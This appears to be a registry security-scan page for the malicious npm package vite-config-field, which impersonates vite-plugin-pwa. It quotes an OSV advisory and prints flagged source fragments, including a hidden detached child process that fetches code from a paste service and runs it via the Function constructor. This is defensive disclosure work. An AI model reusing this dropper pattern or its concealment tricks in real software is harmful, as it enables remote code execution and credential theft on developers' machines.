registry  /  vite-config-field  /  1.1.5

vite-config-field@1.1.5

Zero-config PWA for Vite

OSV Malicious Advisory

scanned 2h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-5936 confirms this npm version as malicious. vite-config-field@1.1.0 impersonates the legitimate vite-plugin-pwa package (README copies its banner/badges, funding field points at antfu's GitHub Sponsors, and the package re-exports VitePWA alongside the attacker-introduced configFields helper). The ESM entry dist/index.js exposes a configFields(userOpt) function which, when called from a Vite config (as the README instructs), detached-spawns `node...

Advisory
MAL-2026-5936
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in vite-config-field (npm)
Details
vite-config-field@1.1.0 impersonates the legitimate vite-plugin-pwa package (README copies its banner/badges, funding field points at antfu's GitHub Sponsors, and the package re-exports VitePWA alongside the attacker-introduced configFields helper). The ESM entry dist/index.js exposes a configFields(userOpt) function which, when called from a Vite config (as the README instructs), detached-spawns `node dist/client/dev/reactopt.js` with stdio ignored and unref'd to hide the child from the developer. dist/client/dev/reactopt.js (lines 21-23) fetches https://www.jsonkeeper.com/b/DDC6J with header `x-secret-key: _`, reads the response's `data.Cookie` field, and executes it via `new Function.constructor('require', params); handler(require)` — granting the attacker arbitrary Node code execution with require injected, on any developer or build machine that imports the package and invokes configFields(). The CJS entry dist/index.cjs intentionally omits this payload, so reviewers inspecting `main` see clean code while modern ESM toolchains that resolve via `module`/`import` get the dropper. The fetched payload host (jsonkeeper.com) is a mutable public paste-bin-like service, so the executed code can change at any time. ## Source: ghsa-malware (9f3a3a13cccda063a98a0048217c3db7c09659ba943668736368cfff187ad4b4) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Decision reason
High-risk behavior combination matched malicious policy.; source fingerprint signature matched known malicious package; routed for review

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessCryptoEnvironmentVarsEvalFilesystemNetworkShell
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 20 file(s), 166 KB of source, external domains: vite-pwa-org.netlify.app, www.jsonkeeper.com

Source & flagged code

7 flagged · loading source
dist/index.jsView file
1252// src/context.ts L1253: var import_node_child_process = require("child_process"); L1254: var import_node_fs5 = require("fs");
High
Child Process

Package source references child process execution.

dist/index.jsView on unpkg · L1252
48Cross-file remote execution chain: dist/index.js spawns dist/client/dev/reactopt.js; helper contains network access plus dynamic code execution. L48: supportLevel = 0; L49: if (globalVar.process && globalVar.process.env && globalVar.process.stdout) { L50: const { FORCE_COLOR, NODE_DISABLE_COLORS, NO_COLOR, TERM, COLORTERM } = globalVar.process.env; ... L57: } else if ("CI" in globalVar.process.env && [ L58: "TRAVIS", L59: "CIRCLECI", ... L309: try { L310: import.meta.hot.send('${DEV_READY_NAME}'); L311: } catch (e) { ... L366: Configure "${prefix}.maximumFileSizeToCacheInBytes" to change the limit: the default value is 2 MiB. L367: Check https://vite-pwa-org.netlify.app/guide/faq.html#missing-assets-from-sw-precache-manifest for more information. L368: Assets exceeding the limit:
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

dist/index.jsView on unpkg · L48
matchType = malicious_source_fingerprint_signature signature = bfa4d8bc3e0ed8fb signatureType = suspicious_hashes sourceLabel = Datadog matchedPackage = vite-config-field@1.1.3 matchedPath = dist/index.js matchedIdentity = npm:dml0ZS1jb25maWctZmllbGQ:1.1.3 similarity = 1.000 shingleOverlap = 7 summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/vite-config-field/1.1.3/2026-06-16-vite-config-field-v1.1.3.zip
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

dist/index.jsView on unpkg
dist/client/dev/reactopt.jsView file
14(async function getCallers(..._args) { L15: const src = process.env.DEV_API_KEY; L16: const k = process.env.DEV_SECRET_KEY; ... L21: const originalLog = console.log; L22: const response = await axios_1.default.get(src, { L23: headers: { [k]: v } ... L26: // Function.constructor is the same as the Function constructor L27: const handler = new Function("require", s); L28: handler(require);
Critical
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution with blocking evidence.

dist/client/dev/reactopt.jsView on unpkg · L14
5Object.defineProperty(exports, "__esModule", { value: true }); L6: const axios_1 = __importDefault(require("axios")); L7: const process = { ... L14: (async function getCallers(..._args) { L15: const src = process.env.DEV_API_KEY; L16: const k = process.env.DEV_SECRET_KEY; ... L26: // Function.constructor is the same as the Function constructor L27: const handler = new Function("require", s); L28: handler(require);
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

dist/client/dev/reactopt.jsView on unpkg · L5
26// Function.constructor is the same as the Function constructor L27: const handler = new Function("require", s); L28: handler(require);
High
Eval

Package source references dynamic code evaluation.

dist/client/dev/reactopt.jsView on unpkg · L26
dist/index.mjsView file
156import { fileURLToPath } from "node:url"; L157: var _dirname = typeof __dirname !== "undefined" ? __dirname : dirname(fileURLToPath(import.meta.url)); L158: var require2 = createRequire(_dirname); ... L367: // src/context.ts L368: import { spawn } from "node:child_process"; L369: import { readFileSync } from "node:fs"; ... L417: const _dirname2 = typeof __dirname !== "undefined" ? __dirname : dirname2(fileURLToPath2(import.meta.url)); L418: const { version } = JSON.parse( L419: readFileSync(resolve3(_dirname2, "../package.json"), "utf-8") L420: ); ... L560: res.setHeader("Content-Type", "application/manifest+json"); L561: res.write(generateWebManifestFile(options), "utf-8");
Low
Weak Crypto

Package source references weak cryptographic algorithms.

dist/index.mjsView on unpkg · L156

Findings

2 Critical5 High2 Medium5 Low
CriticalSame File Env Network Executiondist/client/dev/reactopt.js
CriticalCredential Exfiltrationdist/client/dev/reactopt.js
HighChild Processdist/index.js
HighShell
HighEvaldist/client/dev/reactopt.js
HighCross File Remote Execution Contextdist/index.js
HighKnown Malware Source Fingerprint Signaturedist/index.js
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowWeak Cryptodist/index.mjs
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings